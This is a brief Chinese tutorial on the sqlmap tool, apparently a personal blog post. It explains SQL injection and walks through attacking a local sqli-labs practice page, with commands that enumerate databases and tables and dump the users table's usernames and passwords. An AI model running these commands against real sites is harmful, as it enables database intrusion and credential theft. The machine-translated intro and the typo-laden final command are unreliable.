Salmap注入网站
Sqlmap工具简介
sqlmap 是一个自动SQL 射入工具。它是可胜任执行一个广泛的数据库管理系统后端指印, 检索遥远的DBMS 数据库, usernames, 桌, 专栏, 列举整个DBMS, 读了系统文件和利用导致SQL 射入弱点的网应用编程的安全漏洞。
有许多其它SQL 射入工具在网, 但我不能发现任何人适合所有我的需要因此我感到需要在我的渗透测试期间给成功地写我自己的工具测试, 辨认和利用网应用的SQL 射入在安全上的弱点。
什么是SQL注入漏洞
攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。
SQL注入的本质,因服务端没有过滤用户输入的恶意数据,导致把用户输入的数据当作SQL语句执行,从而影响数据库安全和平台安全。
注入实操
接下来用小皮系统搭建的一个sql环境
打开less-1第一个页面
页面显示输入ID参数提交
这里输入?id=5
可以看到页面发生变化,出来了一个登录名和登录密码
利用这个注入点进行下一步爆破
打开我尘封已久的sqlmap工具
我这里sqlmap必须在python环境下才可使用。
python sqlmap.py -u "http://localhost:8081/Less-1/?id=5"
查看到了数据库的版本号
下一步爆破,爆破数据库库名
python sqlmap.py -u "http://localhost:8081/Less-1/?id=5" --dbs
这里我选择security进行爆破
python sqlmap.py -u "http://localhost:8081/Less-1/?id=5" -D security --tables
可以看到该表中有两行列,接下来对列进行爆破
python sqlmap.py -u "http://localhost:8081/Less-1/?id=5" -D security -T users -c “password, usernane” --dump
爆破出列中的数值
还有更多的功能暂时正在摸索中…